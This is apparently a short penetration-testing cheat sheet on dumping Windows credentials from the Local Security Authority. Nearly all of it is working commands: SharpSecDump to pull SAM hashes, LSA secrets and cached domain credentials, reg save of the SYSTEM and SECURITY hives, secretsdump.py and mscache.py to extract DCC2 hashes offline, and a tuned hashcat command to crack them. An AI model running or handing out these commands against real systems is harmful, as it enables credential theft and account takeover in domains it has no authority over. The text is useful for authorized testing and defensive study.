LSA
Local Security Authority
SharpSecDump
Dump SAM hashes, LSA secrets and cached domain credentials from the target over the remote registry (SharpSecDump is a .NET port of secretsdump.py's remote mode and needs local admin on the target; -target=127.0.0.1 runs it against the local host):
PS > Invoke-SharpSecDump -C "-target=127.0.0.1"
MSCash2/MSCache2 (DCC2)
Domain cached credentials (DCC2/MSCache2 hashes) live under HKLM\SECURITY\Cache and are encrypted with the NL$KM LSA secret, which in turn is protected by the LSA key derived from the boot key in HKLM\SYSTEM, so both hives are needed. Save them as an administrator:
Cmd > reg save hklm\system system.hive
Cmd > reg save hklm\security security.hive
secretsdump.py
Copy the saved hives off the host and extract the cached credentials offline with secretsdump.py (the LOCAL target makes it parse the hives instead of connecting to a host; entries come out as DOMAIN/user:$DCC2$10240#user#hash):
$ secretsdump.py -system system.hive -security security.hive LOCAL
mscache.py
Alternatively, extract the cached credentials from the same saved hives with mscache.py:
$ python mscache.py --system system.hive --security security.hive
Crack
DCC2 is hashcat mode 2100 (PBKDF2-HMAC-SHA1 with 10240 iterations, so expect a tiny fraction of NTLM cracking speed). The input file takes $DCC2$10240#user#hash lines; if you feed secretsdump output in unchanged, add --username so the DOMAIN/user: prefix is ignored. -O selects the optimized kernels, which cap candidate length, so drop it for long-password wordlists:
$ hashcat -m 2100 -O -a 0 -w 3 --session=dcc2 -o dcc2.out dcc2.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule